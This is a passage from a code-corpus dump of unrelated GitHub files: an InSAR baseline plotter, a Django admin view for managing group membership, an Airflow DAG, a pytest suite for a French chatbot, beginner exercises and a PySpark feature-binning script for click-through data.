interpolation='midpoint')\n q3 = np.percentile(t3_list, 75, interpolation='midpoint')\n iqr = q3 - q1\n upper, lower = q3 + 2.0 * iqr, q1 - 2.0 * iqr\n\n for t2 in t3_list:\n if upper > t2 > lower:\n t1.append(t2)\n else:\n i = i + 1\n return np.asarray(list(zip(t1, np.zeros(len(t1))))), i\n\n\nmain()\n\n","repo_name":"citelab/fastsync","sub_path":"Clustering/Cluster.py","file_name":"Cluster.py","file_ext":"py","file_size_in_byte":30785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2092544453","text":"import argparse\nimport njw, ajw, ajw_t, sww, ljw, compound\n\n# Parser\nparser = argparse.ArgumentParser()\n\n# Add arguments\nparser.add_argument(\"--policy\", help=\"Policy Name\", type=str)\nparser.add_argument(\"--lmbda\", help=\"Arrival Rate\", type=float)\nparser.add_argument(\"--mu\", help=\"Service Rate\", type=float)\nparser.add_argument(\"--s\", help=\"Number of Servers\", type=int)\nparser.add_argument(\"--pf\", help=\"Fixed Price\", type=float)\nparser.add_argument(\"--po\", help=\"On-demand Price\", type=float)\nparser.add_argument(\"--b\", help=\"Maximum Wait Time in Seconds\", nargs='?', type=int)\nparser.add_argument(\"--t\", help=\"Maximum Wait Time in Seconds\", nargs='?', type=int)\n\n# Read Command Line arguments\nargs = parser.parse_args()\n\n# Check policy\npolicies = ['NJW', 'AJW', 'AJW-T', 'SWW', 'LJW', 'Compound']\nif args.policy not in policies:\n print (\"Please select one of following policies - \", policies)\n exit()\n\n# NJW\nif args.policy == 'NJW':\n w, p ,r = njw.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)\n\n# AJW\nif args.policy == 'AJW':\n w, p ,r = ajw.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)\n\n# AJW-T\nif args.policy == 'AJW-T':\n if args.b is None:\n print (\"Please specify the maximum waiting time (b) for AJW-T policy.\")\n exit()\n w, p ,r = ajw_t.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s, args.b)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)\n\n# SWW\nif args.policy == 'SWW':\n if args.b is None:\n print (\"Please specify the maximum waiting time (b) for SWW policy.\")\n exit()\n w, p ,r = sww.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s, args.b)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)\n\n# LJW\nif args.policy == 'LJW':\n if args.t is None:\n print (\"Please specify the long job threshold (t) for LJW policy.\")\n exit()\n w, p ,r = ljw.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s, args.t)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)\n\n# Compound\nif args.policy == 'Compound':\n if args.t is None or args.b is None:\n print (\"Please specify both long job threshold (t) and maximum waiting time (b) for Compound policy.\")\n exit()\n w, p ,r = compound.compute_model_values(args.lmbda, args.mu, args.pf, args.po, args.s, args.t, args.b)\n print (\"Mean waiting time in seconds - \", w, \", effective price is \", p,\n \", and the fraction of jobs that run on on-demand resources is \", r)","repo_name":"sustainablecomputinglab/waitinggame","sub_path":"model_analyzer/model_analyzer.py","file_name":"model_analyzer.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39613536144","text":"from django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Group, User\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.utils.text import format_lazy\nfrom django.utils.translation import gettext_lazy as _\n\nfrom zds.member.forms import PromoteMemberForm\nfrom zds.member.models import Profile\nfrom zds.member.utils import get_bot_account\nfrom zds.utils.models import get_hat_from_settings\nfrom zds.mp.utils import send_mp\n\n\n@login_required\ndef settings_promote(request, user_pk):\n \"\"\"\n Manage groups and activation status of a user.\n Only superusers are allowed to use this.\n \"\"\"\n\n if not request.user.is_superuser:\n raise PermissionDenied\n\n profile = get_object_or_404(Profile, user__pk=user_pk)\n user = profile.user\n\n if request.method == \"POST\":\n form = PromoteMemberForm(request.POST)\n data = dict(form.data)\n\n groups = Group.objects.all()\n usergroups = user.groups.all()\n\n if \"groups\" in data:\n for group in groups:\n if str(group.id) in data[\"groups\"]:\n if group not in usergroups:\n user.groups.add(group)\n messages.success(\n request, _(\"{0} appartient maintenant au groupe {1}.\").format(user.username, group.name)\n )\n else:\n if group in usergroups:\n user.groups.remove(group)\n messages.warning(\n request,\n _(\"{0} n'appartient maintenant plus au groupe {1}.\").format(user.username, group.name),\n )\n else:\n user.groups.clear()\n messages.warning(request, _(\"{0} n'appartient (plus ?) à aucun groupe.\").format(user.username))\n\n if \"activation\" in data and \"on\" in data[\"activation\"]:\n user.is_active = True\n messages.success(request, _(\"{0} est maintenant activé.\").format(user.username))\n else:\n user.is_active = False\n messages.warning(request, _(\"{0} est désactivé.\").format(user.username))\n\n user.save()\n\n usergroups = user.groups.all()\n bot = get_bot_account()\n msg = _(\n \"Bonjour {0},\\n\\n\" \"Un administrateur vient de modifier les groupes \" \"auxquels vous appartenez. \\n\"\n ).format(user.username)\n if len(usergroups) > 0:\n msg = format_lazy(\"{}{}\", msg, _(\"Voici la liste des groupes dont vous faites dorénavant partie :\\n\\n\"))\n for group in usergroups:\n msg += f\"* {group.name}\\n\"\n else:\n msg = format_lazy(\"{}{}\", msg, _(\"* Vous ne faites partie d'aucun groupe\"))\n send_mp(\n bot,\n [user],\n _(\"Modification des groupes\"),\n \"\",\n msg,\n send_by_mail=True,\n leave=True,\n hat=get_hat_from_settings(\"moderation\"),\n )\n\n return redirect(profile.get_absolute_url())\n\n form = PromoteMemberForm(initial={\"groups\": user.groups.all(), \"activation\": user.is_active})\n return render(request, \"member/admin/promote.html\", {\"usr\": user, \"profile\": profile, \"form\": form})\n","repo_name":"zestedesavoir/zds-site","sub_path":"zds/member/views/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"61"} +{"seq_id":"37611893694","text":"input_file = open(\"sitin.txt\", \"r\")\noutput_file = open(\"sitout.txt\", \"w\")\nfile_content = input_file.read()\nall_values = file_content.split()\n\nsitting = int(all_values[0]) * int(all_values[1])\nstanding = int(all_values[2]) - sitting\noutput_file.write(str(sitting) + \" \" + str(standing))\n\ninput_file.close()\noutput_file.close()","repo_name":"10and10/aio-training-answers","sub_path":"sitting_or_standing/sitting_or_standing.py","file_name":"sitting_or_standing.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71206387713","text":"\"\"\"Demo DAG initialising BaseHook in function to avoid Airflow DB calls.\"\"\"\n\n# pylint: disable=ungrouped-imports\nimport airflow\nimport requests\nfrom airflow import DAG\nfrom airflow.hooks.base_hook import BaseHook\nfrom airflow.operators.python_operator import PythonOperator\n\nargs = {\"owner\": \"godatadriven\", \"start_date\": airflow.utils.dates.days_ago(14)}\n\ndag = DAG(\n dag_id=\"9_basehook_get_connection\",\n default_args=args,\n schedule_interval=\"0 0 * * *\",\n description=\"Demo DAG initialising BaseHook in function to avoid Airflow DB calls.\",\n)\n\n\ndef _call_http():\n host = BaseHook.get_connection(\"http_default\").host\n response = requests.get(host)\n print(response.text)\n\n\ncall_http = PythonOperator(task_id=\"call_http\", python_callable=_call_http, dag=dag)\n","repo_name":"BasPH/airflow-rocket","sub_path":"dags/9_basehook_get_connection.py","file_name":"9_basehook_get_connection.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"} +{"seq_id":"35497957195","text":"import pytest\n\nfrom app.tests.backend.testtools import TestTools\nfrom app.grandpy.skills.tourist_guide.tourist_guide import TouristGuide\n\n@pytest.mark.trgd\nclass TestTouristGuide:\n\n OC_EXPECTED_ANECODTE = \"L'Hôtel Bourrienne (appelé aussi Hôtel de Bourrienne et \"\\\n \"Petit Hôtel Bourrienne) est un hôtel particulier du XVIIIe siècle situé au 58 \"\\\n \"rue d'Hauteville dans le 10e arrondissement de Paris. Propriété privée, il est \"\\\n \"classé au titre des monuments historiques depuis le 20 juin 1927. En juillet 2015, \"\\\n \"il est acheté par l'entrepreneur Charles Beigbeder pour en faire le siège de ses \"\\\n \"activités d'investissement. [En savoir plus sur Wikipédia]
\"\n SPECIAL_STARTER = \"Mais t'ai-je déjà raconté l'histoire de ce quartier \"\\\n \"qui m'a vu en culottes courtes ?\"\n NO_ANECDOTE = \"Désolé, je n'ai pas d'anecdote sur ce lieu! Wikip... \"\\\n \"JE ne sais pas tout non plus ! 😅\"\n \n @pytest.mark.trgd1a\n def test_if_get_anecdote_from_coordinates_works_as_expected(self):\n \n ex_oc_coordinates = { \"lat\" : 48.8748465, \"lng\" : 2.3504873 }\n matches = []\n\n actual_anecdote = TouristGuide(\"\").get_anecdote(ex_oc_coordinates, matches)\n\n assert actual_anecdote == TestTouristGuide.OC_EXPECTED_ANECODTE\n\n @pytest.mark.trgd1b\n def test_if_get_anecdote_from_coordinates_works_as_expected_when_oc_is_in_matches(self):\n \n ex_oc_coordinates = { \"lat\" : 48.8748465, \"lng\" : 2.3504873 }\n matches = [\"oc\"]\n\n actual_anecdote = TouristGuide(\"\").get_anecdote(ex_oc_coordinates, matches)\n special_response = f\"{TestTouristGuide.SPECIAL_STARTER} \" + \\\n TestTouristGuide.OC_EXPECTED_ANECODTE\n \n assert actual_anecdote == special_response\n \n @pytest.mark.trgd1c\n def test_if_get_anecdote_from_coordinates_works_as_expected_when_encoutering_error(self):\n \n ex_oc_coordinates = { \"lat\" : 0, \"lng\" : 2.3504873 }\n matches = [\"oc\"] # \n\n actual_anecdote = TouristGuide(\"\").get_anecdote(ex_oc_coordinates, matches)\n \n assert actual_anecdote == TestTouristGuide.NO_ANECDOTE\n\n @pytest.mark.trgd3a\n def test_if_get_address_retrieves_the_correct_address_of_the_point_of_interest(self):\n\n actual_message = TouristGuide(\"\").get_address(\"sacré coeur\", \"\") #redondant\n\n expected_message = \"Bien sûr mon poussin ! La voici : \\\"35 Rue du Chevalier de \"\\\n \"la Barre, 75018 Paris\\\".
Et voilà une carte pour t'aider en plus !!
\"\n\n assert actual_message == expected_message\n\n @pytest.mark.trgd3b\n def test_if_get_address_reacts_to_an_error_accordingly(self):\n\n actual_message = TouristGuide(\"\").get_address(\"enfer je sais pas moi\", \"\") #redondant\n\n expected_message = \"Désolé, je n'ai pas d'adresse pour ce lieu... 😞\"\n\n assert actual_message == expected_message\n\n ","repo_name":"Ludophilia/P7v2","sub_path":"app/tests/backend/test_tourist_guide.py","file_name":"test_tourist_guide.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37144255894","text":"#\n#\n#\n#\nPROG='''\nPlotBL_Hyp3InSAR : plot baseline network from folder of Hyp3/Gamma Zip/InSAR \n but extracted {GAMMA_INSAR_PRODUCT}.txt\nPhisan.Chula@gmail.com ( Faculty of Engineering, Chulalongkorn University )\nIntial : 15 January 2022\n'''\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nimport datetime as dt\nfrom collections import Counter\nimport sys, yaml\nfrom PlotNetworkBL import *\n\n############################################################\nclass InSAR_Baseline_Hyp3SDK( InSAR_Baseline ):\n def __init__( self, FOLDER ):\n #import pdb; pdb.set_trace()\n self.FOLDER=FOLDER\n df_ifg = pd.DataFrame( FOLDER.glob( '*.txt'), columns=['Hyp3Path'] )\n df_ifg[['PROD', 'dt_master','dt_slave', 'scene_master','scene_slave',\n 'Bperp_m', 'Btemp_d' ] ] = df_ifg.apply( self.ParseIfgProduct , \n axis='columns', result_type='expand' )\n ####################################\n grs = list( set( list(df_ifg.scene_master)+list(df_ifg.scene_slave)) )\n df_ref = pd.DataFrame( grs , columns=['Granule'] )\n df_ref['PROD'] = df_ref.Granule.str[-4:]\n def ParseGranule(row):\n S1,_,_,_,_,dtacq,_,_,_,NAME4 = row.Granule.split('_') \n return dt.datetime.strptime( dtacq, '%Y%m%dT%H%M%S' )\n df_ref['dtAcq'] = df_ref.apply( ParseGranule , axis='columns' )\n df_ref.sort_values(by='dtAcq',ascending=False,inplace=True,ignore_index=True)\n #import pdb; pdb.set_trace()\n df_ref['Btemp0_d'] = (df_ref['dtAcq']-df_ref.iloc[0]['dtAcq']).dt.days\n self.df_ifg = df_ifg; self.df_ref = df_ref\n self.SolveBaselineRef()\n super().__init__()\n\n def ParseIfgProduct(self, row):\n S1,dtms,dtsl,VVP,_,_,_,NAME4 = row['Hyp3Path'].stem.split('_')\n day_sep = int(VVP[-3:]) # only + !!!\n dtms = dt.datetime.strptime( dtms, '%Y%m%dT%H%M%S' )\n dtsl = dt.datetime.strptime( dtsl, '%Y%m%dT%H%M%S' )\n day_diff = (dtsl-dtms).days\n with open( row.Hyp3Path ) as f:\n YAML = yaml.load( f, Loader=yaml.FullLoader )\n return (NAME4, dtms, dtsl, YAML['Reference Granule'], YAML['Secondary Granule'],\n YAML['Baseline'], day_diff )\n\n def SolveBaselineRef(self):\n N = len(self.df_ref)\n mtx = list(); rhs = list()\n mtxrow = N*[0]; mtxrow[0]=+1; mtx.append( mtxrow ) # latest acq - reference\n rhs.append( 0.0 ) # refence ganule\n for i,row in self.df_ifg.iterrows():\n mtxrow = N*[0]\n idx_fr = self.df_ref[ self.df_ref['Granule']==row.scene_master ].index[0]\n idx_to = self.df_ref[ self.df_ref['Granule']==row.scene_slave ].index[0]\n mtxrow[idx_fr] = -1\n mtxrow[idx_to] = +1\n mtx.append( mtxrow )\n rhs.append( row.Bperp_m )\n #print( mtxrow )\n A = np.array(mtx)\n B = np.array(rhs).T\n res = np.linalg.lstsq(A,B,rcond=-1)\n if res[1]>1: raise f\"Waning residual {res[1]} is too large !!!!\"\n self.df_ref['Bperp0_m'] = np.round( res[0], 1)\n #import pdb; pdb.set_trace()\n return\n\n############################################################\n#FOLDER = Path( 'Prepare/ASC_CMI_PYO_2021' )\nFOLDER = Path( 'Prepare/DES_CMI_PYO_2021' )\n\nif len(sys.argv)==2:\n FOLDER = sys.argv[1]\n bl = InSAR_Baseline_Hyp3SDK( Path(FOLDER) )\nelse:\n print(PROG)\n print('Usage: PlotBL_InSAR None:\n super().__init__()\n self.number = number\n self.guesses = 0\n self.min = min\n self.max = max\n\n def get_guess(self):\n guess = input(\"Please guess the number (between 0-100)\")\n\n if self.valid_number(guess):\n return int(guess)\n print(\"Please enter a valid number.\")\n return self.get_guess()\n\n def valid_number(self, str_number):\n # return False or True\n # check the condition 1\n try:\n # convert string to number\n # alphabet > cause the error\n number = int(str_number)\n except:\n # go to this one\n return False\n # check the condition 2\n return self.min < number < self.max\n\n def play(self):\n while True:\n self.guesses += 1\n\n guess = self.get_guess()\n\n print(\"Guess\")\n\n if guess < self.number:\n print(\"You guess was under\")\n elif guess > self.number:\n print(\"You guess was over.\")\n else:\n break\n print(\"Done\")\n\n\ngame = GuessNumber(25, 4, 100)\ngame.play()\n","repo_name":"leviethung2103/SoftwareDesign","sub_path":"Basic/example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37366611359","text":"'''\nA serializer for the DataPoint EEG representation\nthat allows transfer to the JSON format from our model\n\nLast edited by\nName: Nick Velicer\nDate: 11/19\n'''\n\nfrom rest_framework import serializers\nfrom api.models import DataPoint, EEGData\n\n\nclass DataPointSerializer(serializers.ModelSerializer):\n class Meta:\n model = DataPoint\n fields = ['id', \n 'idNum', \n 'ch1',\n 'ch2',\n 'ch3',\n 'ch4',\n 'ch5',\n 'ch6',\n 'ch7',\n 'ch8',\n 'ch9',\n 'ch10',\n 'ch11',\n 'ch12',\n 'ch13',\n 'ch14']\n\nclass FileUploadSerializer(serializers.Serializer):\n \"\"\"\n Serializer to transfer the file to the backend.\n \"\"\"\n file = serializers.FileField()\n\nclass SaveFileSerializer(serializers.Serializer):\n \"\"\"\n Each row of data from the csv will go through this \n serializer and validate it has all the right values.\n \"\"\"\n class Meta:\n model = EEGData\n fields = \"__all__\"","repo_name":"Nick-Velicer/SoundField","sub_path":"backend/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"43144473120","text":"# idea : https://leetcode.com/problems/longest-nice-subarray/discuss/2527357/Sliding-window-O(n)-or-Fully-Explained\n\nclass Solution:\n def longestNiceSubarray(self, nums: List[int]) -> int:\n cur_num = nums[0]\n longest = 1\n l = 0\n \n for r in range(1, len(nums)):\n while l != r and nums[r] & cur_num != 0: # bcz all pair shud have AND = 0\n cur_num -= nums[l]\n l += 1\n \n longest = max(longest, r - l + 1)\n cur_num += nums[r] # using OR to consider all elements in subarray\n \n \n return longest","repo_name":"hardik302001/leetcode","sub_path":"problems/longest_nice_subarray/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"10009502283","text":"import pytest\nfrom tests.metaschema.datatypes.test_MetaschemaType import (\n TestMetaschemaType as base_class)\nfrom yggdrasil.metaschema.datatypes.FunctionMetaschemaType import example_func\n\n\nclass TestFunctionMetaschemaType(base_class):\n r\"\"\"Test class for FunctionMetaschemaType class with float.\"\"\"\n\n _mod = 'yggdrasil.metaschema.datatypes.FunctionMetaschemaType'\n _cls = 'FunctionMetaschemaType'\n\n @pytest.fixture(scope=\"class\")\n def value(self):\n r\"\"\"function: Test function.\"\"\"\n return example_func\n \n @pytest.fixture(scope=\"class\")\n def valid_encoded(self, python_class, typedef_base):\n r\"\"\"list: Encoded objects that are valid under this type.\"\"\"\n return [dict(typedef_base,\n type=python_class.name)]\n \n @pytest.fixture(scope=\"class\")\n def valid_decoded(self, value):\n r\"\"\"list: Objects that are valid under this type.\"\"\"\n return [value]\n \n @pytest.fixture(scope=\"class\")\n def invalid_decoded(self):\n r\"\"\"list: Objects that are invalid under this type.\"\"\"\n return [object]\n\n @pytest.fixture(scope=\"class\")\n def compatible_objects(self, value):\n r\"\"\"list: Objects that are compatible with this type.\"\"\"\n return [(value, value, None)]\n\n @pytest.fixture(scope=\"class\")\n def valid_normalize(self):\n r\"\"\"list: Pairs of pre-/post-normalized objects.\"\"\"\n return [(None, None),\n ('yggdrasil.metaschema.datatypes.FunctionMetaschemaType'\n ':example_func', example_func)]\n\n def test_decode_data_errors(self, python_class):\n r\"\"\"Test errors in decode_data.\"\"\"\n with pytest.raises(ValueError):\n python_class.decode_data('hello', None)\n with pytest.raises(AttributeError):\n python_class.decode_data('yggdrasil:invalid', None)\n","repo_name":"chrishavlin/yggdrasil","sub_path":"tests/metaschema/datatypes/test_FunctionMetaschemaType.py","file_name":"test_FunctionMetaschemaType.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"6309235127","text":"import csv\n\ngamma = {}\nbigram_freq = {}\npreds = {}\nsuccs = {}\n\nwith open('School/Capstone/ngrams_words_3.txt', newline='') as lines:\n reader = csv.reader(lines, delimiter = '\\t')\n for line in reader:\n line = ' '.join(line)\n line = line.lower().split(' ')\n #print(line[1:4])\n gamma[line[1]] = gamma.get(line[1], 0) + 1\n gamma[line[2]] = gamma.get(line[2], 0) + 1\n gamma[line[3]] = gamma.get(line[3], 0) + 1\n if line[2] not in preds:\n preds[line[2]] = [line[1]]\n else:\n preds[line[2]].append(line[1])\n\n if line[2] not in succs:\n succs[line[2]] = [line[3]]\n else:\n succs[line[2]].append(line[3])\n\n bigram_freq[line[1] + ' ' + line[2]] = bigram_freq.get(line[1] + ' ' + line[2], 0) + int(line[0])\n bigram_freq[line[2] + ' ' + line[3]] = bigram_freq.get(line[2] + ' ' + line[3], 0) + int(line[0])\n\n#print(gamma)\nprint(bigram_freq)\n#print(preds)\n#print(succs)","repo_name":"birdas/Capstone","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28381013303","text":"import logging\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef logger_raise_warn_exception(error_post_data, exception_type, detail):\n logger.warning(f'{detail}')\n logger.warning(error_post_data)\n raise exception_type(detail=detail)\n\ndef logger_info(*args):\n for info in args:\n logger.info(info)\n","repo_name":"giaphiendev/base_django","sub_path":"django_app/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8827626575","text":"from po.base_page import BasePage\nfrom utils.file_handle import FileHandle\n\n\nclass UserInfoPage(BasePage):\n\n URL = \"http://testingedu.com.cn:8000/Home/User/info.html\"\n PRIVIEW_IMG = 'preview'\n AVTAR_IFRAME1 = '//*[@id=\"layui-layer-iframe1\"]'\n FILE_INPUT = '//*[@id=\"filePicker\"]/div[2]/input'\n FILE_UPLOAD_SUC_TXT = '//span[text()=\"100%\"]'\n FILE_SAVE_BTN = '//div[@class=\"saveBtn\"]'\n RE_UPLOAD = '//a[text()=\"重新上传\"]'\n CONFIRM_BTN = '//*[@value=\"确认保存\"]'\n\n\n data_file_path = FileHandle.absolute_path('','images.jpeg')\n\n def upload_avtar(self,file_path=data_file_path):\n self.get_url(self.URL)\n self.click_js(self.PRIVIEW_IMG)\n self.wait_until(self.AVTAR_IFRAME1,10)\n\n self.into_iframe(self.AVTAR_IFRAME1)\n self.input(self.FILE_INPUT,file_path)\n \n def expect_upload_suc(self):\n self.wait_until(self.FILE_SAVE_BTN,10)\n\n def save_upload(self):\n self.click(self.FILE_SAVE_BTN)\n self.out_to_iframe()\n self.click(self.CONFIRM_BTN)\n\n def expect_upload_fail(self,timeout=10):\n self.wait_until(self.RE_UPLOAD,timeout)\n\n\n\n","repo_name":"candice0430/mall_ui_test","sub_path":"po/UserInfoPage.py","file_name":"UserInfoPage.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25055479290","text":"def remove_junk(text):\r\n for junk_char in \" -\":\r\n new_text = text.replace(junk_char, '')\r\n return new_text\r\n\r\ndef transform_into_words(number):\r\n dict_n = {0: \"\", 1: \"One\", 2: \"Two\", 3: \"Three\", 4: \"Four\", 5: \"Five\", \\\r\n 6: \"Six\", 7: \"Seven\", 8: \"Eight\", 9: \"Nine\", 10: \"Ten\", \\\r\n 11: \"Eleven\", 12: \"Twelve\", 13: \"Thirteen\", 14: \"Fourteen\", \\\r\n 15: \"Fifteen\", 16: \"Sixteen\", 17: \"Seventeen\", 18: \"Eighteen\", 19: \"Nineteen\"}\r\n dict_n2 = [\"Twenty\", \"Thirty\", \"Forty\", \"Fifty\", \"Sixty\", \"Seventy\", \"Eighty\", \"Ninety\"]\r\n\r\n number_str = str(number)\r\n if len(number_str) > 3:\r\n thousends = number_str[-4]\r\n else:\r\n thousends = 0\r\n if len(number_str) > 2:\r\n houndreds = number_str[-3]\r\n else:\r\n houndreds = 0\r\n if len(number_str) > 1:\r\n tens = number_str[-2]\r\n else:\r\n tens = '0'\r\n digits = number_str[-1]\r\n\r\n number_in_words = \"\"\r\n if int(thousends):\r\n number_in_words += dict_n[int(thousends)] + \"thousand\"\r\n if int(houndreds):\r\n number_in_words += dict_n[int(houndreds)] + \"hundred\"\r\n if (int(houndreds) or int(thousends)) and (int(digits) or int(tens)):\r\n number_in_words += \"and\"\r\n if tens >= '2':\r\n number_in_words += dict_n2[int(tens) - 2]\r\n if int(digits):\r\n number_in_words+= \"-\"\r\n number_in_words += dict_n[int(digits)]\r\n elif tens >= '1':\r\n number_in_words += dict_n[int(digits) + 10]\r\n else:\r\n number_in_words += dict_n[int(digits)]\r\n \r\n return number_in_words\r\n\r\nsum = 0\r\n\r\n#print(transform_into_words(4021))\r\n\r\nf = open(\"D:\\\\numbers to letters.txt\", 'w')\r\n\r\nfor i in range(1, 1000 + 1):\r\n number_str = remove_junk(transform_into_words(i))\r\n f.write(number_str)\r\n f.write(\"\\n\")\r\n sum += len(number_str)\r\n\r\nf.close()\r\n\r\n\r\nprint(sum)\r\n\r\n\r\n","repo_name":"ATEUCT800/Eiler-Project","sub_path":"17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23448855391","text":"# -*- coding: utf-8 -*-\nimport sys\n\ndef calcInvite(max_level, audience):\n surplus = 0\n invite = 0\n for i in xrange(max_level+1):\n if audience[i] == 0:\n if surplus > 0:\n surplus -= 1\n else:\n invite += 1\n else:\n surplus += audience[i] - 1\n\n return invite\n\nif __name__ == \"__main__\":\n f = open(sys.argv[1], 'r')\n test_num = int(f.readline())\n\n for i in xrange(1, test_num+1):\n line = f.readline().split()\n ans = calcInvite(int(line[0]), map(int, line[1]))\n print('Case #%i: %s' % (i, ans) )\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/137.py","file_name":"137.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3414795187","text":"import re\nimport ast\nimport time\nimport itertools\nimport pyspark\nimport numpy as np\nfrom numpy import allclose\nimport pandas as pd\n#import matplotlib.pyplot as plt\nfrom pyspark.sql import Row\nfrom pyspark.sql import SQLContext\nimport pyspark.sql.functions as F\nfrom pyspark.ml.feature import StandardScaler\nfrom pyspark.sql.functions import *\nfrom pyspark.ml.classification import RandomForestClassifier\nfrom pyspark.ml.feature import StringIndexer, OneHotEncoderEstimator, VectorAssembler, VectorSlicer\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.evaluation import BinaryClassificationEvaluator\nfrom pyspark.ml.linalg import Vectors\nfrom pyspark.ml.feature import Imputer\nfrom pyspark.ml.tuning import ParamGridBuilder, TrainValidationSplit\n\n# start Spark Session (RUN THIS CELL AS IS)\nfrom pyspark.sql import SparkSession\nsc = pyspark.SparkContext()\nsqlContext = SQLContext(sc)\n\nrawTrainRDD = sc.textFile('gs://w261-tktruong/data/train.txt')\ntrainRDD, devRDD, testRDD = rawTrainRDD.randomSplit([0.8,0.1, 0.1], seed = 2018)\nedaRDD, otherRDD = trainRDD.randomSplit([0.0003, 0.9997], seed = 2018)\n\n#tenK_raw = ast.literal_eval(open(\"gs://w261-tktruong/eda.txt\", \"r\").read())\n\ndef parse_raw_row(row):\n '''\n for each row in the raw data, output is a list of label and all the features:\n - [label, feature_1, feature_1, ...]\n For first 13 features, change the data type to number.\n Remaining features will of type string.\n For null values, populate None\n '''\n \n row_values = row.split('\\t')\n for i, value in enumerate(row_values):\n if i <14:\n row_values[i] = float(value) if value != '' else None\n else:\n row_values[i] = value if value != '' else None\n # \"''\"\n return row_values\n\n# Calculate click through rate frequency count of each category\n\ndef BinCategoricalFeatures(tenK_df4):\n '''\n takes a spark df with numerical and categorical columns\n outputs a spark df where all the categorical features are binned using custom logic\n '''\n exclude_list = ['_20', '_31', '_37']\n\n tenK_click_df = tenK_df4\n for n,i in enumerate(tenK_df4.dtypes):\n\n if i[1]=='string':\n\n feature = i[0]\n\n # frequency count of unique categories under each feature\n cat_freqDF = tenK_df4.groupBy(feature).count()\n\n # click through frequency count: count of 'label = 1' for each category\n click_freqDF = tenK_df4.where(\"_1 == 1\").groupBy(feature, \"_1\").count()\n\n\n ## Calculate click through frequency ratio for each category:\n ##(count of 'label = 1'/total count)\n\n df1 = click_freqDF.alias('df1')\n df2 = cat_freqDF.alias('df2')\n if n == 0:\n df3 = tenK_df4.alias('df3')\n else:\n df3 = tenK_click_df.alias('df3')\n\n tenK_click_df = df1.join(df2, [feature]).join(df3, [feature]).select(feature, 'df3.*',\n (df1['count']/df2['count']).alias(feature+\"_click\"))\n\n ## End of click through frequency ratio calculation\n\n ###### Bin data into binary bins based on the click through rate(ctr).\n\n if i[0] not in exclude_list:\n\n # if ctr == 0, value = A\n # else value = B\n # Keep null values as it is\n tenK_click_df = tenK_click_df.withColumn(feature,\n F.when(tenK_click_df[feature+'_click'] == 0, F.lit(\"A\"))\n .otherwise(F.lit(\"B\")))\n\n\n elif i[0] in ['_20', '_31']:\n\n max_ctr = tenK_click_df.agg({feature+\"_click\": \"max\"}).collect()[0][0]\n ctr_threshold = max_ctr/2\n\n # if ctr == 0, value = A\n # if ctr > 0 and <= threshhold, value = B\n # else value = C\n # Keep null values as it is\n tenK_click_df = tenK_click_df.withColumn(feature,\n F.when(tenK_click_df[feature+'_click'] == 0, F.lit(\"A\"))\n .otherwise(\n F.when((tenK_click_df[feature+'_click'] > ctr_threshold)|(tenK_click_df[feature+'_click'] > ctr_threshold)\n , F.lit(\"B\"))\n 